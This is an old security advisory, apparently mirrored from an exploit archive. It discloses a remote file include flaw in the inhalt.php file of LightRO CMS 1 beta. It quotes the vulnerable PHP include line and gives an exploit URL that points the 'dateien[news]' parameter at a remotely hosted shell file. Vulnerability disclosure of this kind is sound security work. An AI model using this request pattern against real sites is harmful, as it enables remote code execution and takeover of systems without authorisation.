Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15988
HistoryFeb 07, 2007 - 12:00 a.m.

LightRO CMS 1 beta(inhalt.php) Remote File Include Vulnerability

2007-02-0700:00:00
vulners.com
30

Title : LightRO CMS 1 beta(inhalt.php) Remote File Include Vulnerability

Author : ajann

Contact : :(

S.Page : http://www.lightro.de.tc/

$$ : Free


[[ERROR]]]



<?
include $dateien['news'];
?>


[[ERROR]]]

[[RFI]]]

http://[target]/[path]/inhalt.php?dateien[news]=[SHELL]

Example:

//inhalt.php?dateien[news]=http://[target]/[path]/shell.x

[[/RFI]]

"""""""""""""""""""""

ajann,Turkey

Im not Hacker!